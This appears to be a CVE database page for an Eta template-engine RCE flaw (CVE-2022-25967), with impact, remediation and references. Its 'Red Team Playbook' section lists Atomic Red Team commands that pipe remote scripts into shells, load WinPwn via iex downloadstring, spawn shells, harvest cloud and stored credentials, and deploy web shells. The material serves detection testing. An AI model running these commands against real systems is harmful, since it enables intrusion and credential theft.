CVE-2022-25967
Overview
This vulnerability is a remote code execution (RCE) flaw caused by improper handling of template engine configuration variables within the Eta rendering engine. Specifically, the root cause lies in the overwriting of internal configuration parameters via user-supplied view options passed through the Express render API. The affected component is the Eta template engine versions prior to 2.0.0, which fails to adequately isolate configuration from untrusted input during template rendering.
Vulnerability Description
Versions of the package eta before 2.0.0 are vulnerable to Remote Code Execution (RCE) by overwriting template engine configuration variables with view options received from The Express render API. **Note:** This is exploitable only for users who are rendering templates with user-defined data.
Impact
An attacker can execute arbitrary code on the server by supplying crafted view options during template rendering, potentially leading to full system compromise. This requires the application to render templates with user-controlled input, but no authentication or user interaction is necessary (CVSS vector AV:N/AC:H/PR:N/UI:N). Successful exploitation can result in data disclosure, service disruption, or lateral movement within the affected environment, impacting confidentiality, integrity, and availability.
Solution
Upgrade the Eta package to version 2.0.0 or later, where this vulnerability has been addressed. Detailed remediation steps and patch information are available in the Snyk advisory (https://security.snyk.io/vuln/SNYK-JS-ETA-2936803). Reviewing the Eta GitHub repository commits around the referenced source files (file-handlers.ts and compile-string.ts) can provide additional context on the applied fixes. No official workarounds have been documented outside of upgrading.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the eta template engine prior to version 2.0.0 allows for remote code execution (RCE) due to improper handling of user-defined data within the rendering process. Specifically, the flaw arises from the ability of an attacker to overwrite configuration variables of the template engine by manipulating view options passed through the Express render API. This exploitation occurs when the application accepts and processes user input without adequate validation or sanitization, enabling malicious users to inject arbitrary code that can be executed on the server.
Attack vectors for this vulnerability primarily involve crafting malicious requests that include specially formatted data intended to alter the behavior of the template engine. An attacker can exploit this weakness by sending crafted payloads that modify the configuration settings of the eta template engine, leading to the execution of arbitrary code on the server. Scenarios may include a web application that dynamically renders templates based on user input, such as a content management system or a web-based application that allows user-generated content. If an attacker successfully exploits this vulnerability, they can execute commands with the same privileges as the application, potentially leading to full system compromise.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the eta template engine for rendering dynamic content. The risk extends beyond mere data theft; successful exploitation can lead to unauthorized access to sensitive information, manipulation of application logic, and even complete control over the affected server. This poses a substantial business risk, as it can result in reputational damage, financial loss, and legal ramifications stemming from data breaches or service disruptions. Organizations that fail to address this vulnerability may also face compliance issues with data protection regulations, further exacerbating the potential fallout.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to upgrade to the latest version of the eta template engine, which addresses this security flaw. Regularly updating software components is a fundamental practice in maintaining a secure environment. Additionally, developers should enforce strict input validation and sanitization measures to ensure that user-defined data cannot alter the intended behavior of the template engine. Employing security best practices such as the principle of least privilege can also help minimize the impact of potential exploitation by restricting the permissions of the application and its components.
Furthermore, organizations should conduct regular security assessments, including code reviews and penetration testing, to identify and remediate vulnerabilities in their applications. Monitoring and logging user interactions with the application can also aid in detecting suspicious activities that may indicate an attempted exploitation of this vulnerability. By adopting a proactive security posture and fostering a culture of security awareness among developers, organizations can significantly reduce the risk associated with this and similar vulnerabilities in the future.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Eta.js | Eta | All |
cpe:2.3:a:eta.js:eta:*:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-25967 |
| security.snyk.io |
GitHub CVE
|
https://security.snyk.io/vuln/SNYK-JS-ETA-2936803 |
| github.com |
GitHub CVE
|
https://github.com/eta-dev/eta/blob/9c8e4263d3a559444a3881a85c1607bf344d0b28/src/file-handlers.ts%23L182 |
| github.com |
GitHub CVE
|
https://github.com/eta-dev/eta/blob/9c8e4263d3a559444a3881a85c1607bf344d0b28/src/compile-string.ts%23L21 |
| github.com |
GitHub CVE
|
https://github.com/eta-dev/eta/commit/5651392462ee0ff19d77c8481081a99e5b9138dd |